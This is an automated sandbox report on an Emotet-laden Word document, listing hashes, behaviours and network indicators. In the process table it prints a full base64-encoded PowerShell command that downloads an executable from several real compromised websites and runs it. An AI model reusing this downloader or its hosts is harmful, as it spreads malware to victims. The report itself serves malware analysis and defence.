analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

[email protected]

Full analysis: https://app.any.run/tasks/21c57cce-bb34-4056-9a44-92927a9655a9
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: November 21, 2021, 19:15:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

B92021CA10AED3046FC3BE5AC1C2A094

SHA1:

0FB1AD5B53CDD09A7268C823EC796A6E623F086F

SHA256:

C378387344E0A552DC065DE6BFA607FD26E0B5C569751C79FBF9C6F2E91C9807

SSDEEP:

3072:/Msknok2er/yR5DpQKajNDu1CkBwN0pqJfWSq:zkoRoKDpQZqQkmN0scR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Reads the date of Windows installation

      • powershell.exe (PID: 2152)

    • Reads the computer name

      • powershell.exe (PID: 2152)

    • Checks supported languages

      • powershell.exe (PID: 2152)

    • Reads Environment values

      • powershell.exe (PID: 2152)

    • PowerShell script executed

      • powershell.exe (PID: 2152)

    • Creates files in the user directory

      • powershell.exe (PID: 2152)

    • Executed via WMI

      • powershell.exe (PID: 2152)

    • Executes application which crashes

      • powershell.exe (PID: 2152)

  • INFO

    • Reads the computer name

      • WINWORD.EXE (PID: 3296)

    • Reads settings of System Certificates

      • powershell.exe (PID: 2152)

    • Reads mouse settings

      • WINWORD.EXE (PID: 3296)

    • Checks supported languages

      • WINWORD.EXE (PID: 3296)
      • ntvdm.exe (PID: 968)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3296)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3296)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

XML

AppVersion: 16
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 445
LinksUpToDate: No
Company: -
ScaleCrop: No
Paragraphs: 1
Lines: 3
DocSecurity: None
Application: Microsoft Office Word
Characters: 380
Words: 66
Pages: 1
TotalEditTime: -
Template: Normal.dotm
ModifyDate: 2019:09:16 12:22:00Z
CreateDate: 2019:09:16 12:22:00Z
RevisionNumber: 1
LastModifiedBy: -
Keywords: -

XMP

Description: -
Creator: -
Subject: -
Title: -

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 3939
ZipCompressedSize: 524
ZipCRC: 0x247a0b47
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe ntvdm.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3296"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\[email protected]"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2152powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
968"C:\Windows\system32\ntvdm.exe" -i1 C:\Windows\system32\ntvdm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
NTVDM.EXE
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
8 309
Read events
7 487
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
40
Unknown types
3

Dropped files

PID
Process
Filename
Type
3296WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR166D.tmp.cvr
MD5:
SHA256:
3296WINWORD.EXEC:\Users\admin\AppData\Local\Temp\[email protected]pgc
MD5:5E6044E97F1C4BDAAF16B5DA6279997D
SHA256:6270E0AD563A5C7B5090E4CCF1B7A1A92E34A4D8D1B3D92F96A6E9779FFDEC57
3296WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:3656172ECE5D5D52FAA94F1C603083D6
SHA256:8115F3FE078B4EC6C179BC53ED9407DD1FD0A04D9B4D503763A49099D2D9E8B5
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\375E43EC.datimage
MD5:B968160E32B2FBEBB3FF6C55F5B4885B
SHA256:7CF4AE188785F7C0E5E4A1D5BDAC0B52BC65D3AA46513022A9E35489765C19C9
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93B6FB42.datimage
MD5:C1F138C3F19B5545D60B3B5D4C2BA4FC
SHA256:80C4552EC9FED881E1806AA55368D3428832F52157AB8D92E7FB531658961A3E
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2AA0FCA0.datimage
MD5:B2B55276284D41BAA290155CB55A94E2
SHA256:C08D5EC45948BDE7FBA129C2BD1A6BF2816015DA7BC0B8BC76DE8F8F3727D2CD
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98D539F8.datimage
MD5:23EE1904F10A3641361F163E000DFF66
SHA256:58D13515C530476E847D64718305B845B4110F87C88C7761BA9A053653499001
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7E29814.datimage
MD5:48D1B152FC6F014B9C45DBB5A7941F4D
SHA256:61CBDA84CEB5254E134CB6F59EA9D73812B48EF380298D53AEE6CC09BAA966F3
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A830BD7.wmfimage
MD5:A53FD310182B8DA14BE0E22A440105EA
SHA256:52A469268392E4252E6EF7F8D42BE5F6A02BE7C3383E5E71D94E0789591FF1DC
3296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\40458E9F.wmfimage
MD5:47494691A7204F143E5910EF1947C99E
SHA256:CDFB8B2FF4202BC86346915D1EBDE4E45AB67E40E50EE8D0529D4D7FC4EEC759
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
7
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2152
powershell.exe
GET
301
173.198.248.218:80
http://www.deepikarai.com/bangalore-escorts.php
US
html
256 b
malicious
2152
powershell.exe
GET
200
208.91.197.27:80
http://blockchainjoblist.com/wp-admin/014080/
US
html
18.0 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2152
powershell.exe
208.91.197.27:80
blockchainjoblist.com
Confluence Networks Inc
US
malicious
2152
powershell.exe
173.198.248.218:80
deepikarai.com
Turnkey Internet Inc.
US
unknown
2152
powershell.exe
78.41.204.28:443
yeuquynhnhai.com
Snel.com B.V.
NL
malicious
2152
powershell.exe
173.198.248.218:443
deepikarai.com
Turnkey Internet Inc.
US
unknown

DNS requests

Domain
IP
Reputation
blockchainjoblist.com
  • 208.91.197.27
malicious
womenempowermentpakistan.com
malicious
atnimanvilla.com
malicious
yeuquynhnhai.com
  • 78.41.204.28
malicious
deepikarai.com
  • 173.198.248.218
suspicious
www.deepikarai.com
  • 173.198.248.218
unknown

Threats

No threats detected
No debug info